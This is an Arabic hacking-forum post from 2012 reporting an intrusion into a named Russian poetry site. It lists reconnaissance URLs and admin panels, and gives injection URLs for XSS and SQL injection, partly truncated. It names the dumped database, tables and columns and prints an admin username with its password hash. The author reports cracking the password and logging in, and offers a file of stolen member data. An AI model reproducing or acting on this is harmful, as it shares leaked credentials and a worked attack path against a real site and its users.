عرض مشاركة واحدة
قديم 06-20-2012, 11:06 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
خالد سعودي
 
الصورة الرمزية خالد سعودي
 

 

 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

افتراضي معلومات موقع مع الادمن بواسطة خالد سعودي تضامن مع الشعب السوري الحر


بسم الله الرحمن الرحيم
السلام عليكم ورحمه الله وبركاته
http://www.tristihii.ru/
Server: Apache
http://www.tristihii.ru/phpinfo.php
http://www.tristihii.ru/robots.txt
http://www.tristihii.ru/feedback/admin/
http://www.tristihii.ru/forum3//adm(تم تعطيلها من قبل الموقع)
http://www.tristihii.ru/forum3/ucp.php?mode=login ( دخول المنتدي الاعضاء) فكيت الباس المشفر ممكن دخول الادمن من هنا مثل الاعضاء
ثغرات المصابة
http://www.tristihii.ru/raspis/ind.p...)%3C/script%3E

http://www.tristihii.ru/raspis/ind.p...w=1&school=all'
تم استغلال الثغرت sql وستخراج المعلومات
عدد الصفوف: 1040

المفيد
القاعدة stihii38_club الجدول poll_user العمود username,userpass
النتيجة
admin:f5328997cd73821b7258bdfe81d87266

الباس المشفر بعد فكه

تم الدخول ولكن
http://www.tristihii.ru/feedback/admin/
ليس لها صلاحية كافية

القاعدة stihii38_club الجدول forum3_users العمود username,username_clean,user_password,user_email,u ser_email_hash
ملاحظة اذ ماضيفت العمود user_email_hash =82181265626 يطلع ماهو واضح؟؟؟

النتيجة


يرفع لكم ملف txt

فك الباسبورد المشفر
دخل من هنا url]http://www.tristihii.ru/forum3/ucp.php?mode=login
ركز على رقم [23]
ممكن يكون دخول نفس الاعضاء

فمان الرحمن
تضامن مع الشعب السوري الحر




lug,lhj l,ru lu hgh]lk f,hs'm ohg] su,]d jqhlk hgauf hgs,vd hgpv

الملفات المرفقة
نوع الملف: txt معلومات الاعضاء.txt‏ (16.6 كيلوبايت, المشاهدات 11)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات

   

رد مع اقتباس